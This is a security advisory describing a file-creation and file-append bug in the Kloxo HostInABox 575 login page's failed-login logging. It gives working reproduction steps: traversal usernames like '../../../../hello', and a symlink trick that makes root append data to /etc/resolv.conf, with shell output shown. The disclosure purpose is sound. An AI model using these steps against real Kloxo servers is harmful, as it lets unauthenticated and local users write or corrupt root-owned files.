Kloxo HostInABox 575 - Remote, unauthenticated users could create files and directories with names they that partially control. Local users could append uncontrolled data to any file



DESCRIPTION


Due to a bug in the logging routine for failed login attempts (a simple typo), a remote, unauthenticated person could create files and directories on the local filesystem via a crafted username in the username field of the login page. This also allowed for local users to append uncontrolled data to any file on the box.



IMPACT


Remote users could write all over the filesystem, while local users could corrupt files.


1. Browse to http://x.x.x.x:7778 (or domain:7778)
2. In the username field, enter anything, valid account or not. We'll use: test
3. In the password field, enter anything. We'll use: test
4. Click the login button


This will cause this directory: /usr/local/lxlabs/kloxo/log to now have this file: Failed Login attempt to test from x.x.x.x

(where x.x.x.x is the IP address that the failed login attempt came from, of course). Note that the file is written as root. Now append a "/" to "test" and attempt to log in again.

This causes the following directory to be created: /usr/local/lxlabs/kloxo/log/Failed Login attempt to test

which contains this file: from x.x.x.x


Directory traversal can also be used, which will ultimately allow a local user to append data to any file on the box via a symlink attack.

Directory traversal example on the login page:

username: ../../../../../../../../hello
password: test


[root@testing574 /usr/local/lxlabs/kloxo/log]# ls -l / | grep hello
-rw-r--r--  1 root root     24 May 19 16:56 hello from x.x.x.x

Since the user can control the location on the filesystem that the file will be written to, they can use a symlink attack to append junk to the end of a file:

[user1@testing574 /tmp]$ ln -s /etc/resolv.conf 'test from x.x.x.x'

* Replace "x.x.x.x" with the IP address that you'll be attempting to log in from.

Attempt to log in with any password and this username: ../../../../../../../tmp/test

Now observe that /etc/resolv.conf had data appended to it:

[user1@testing574 tmp]$ cat /etc/resolv.conf
nameserver 4.2.2.1
nameserver 4.2.2.2
20:09 May/20/2009: NULL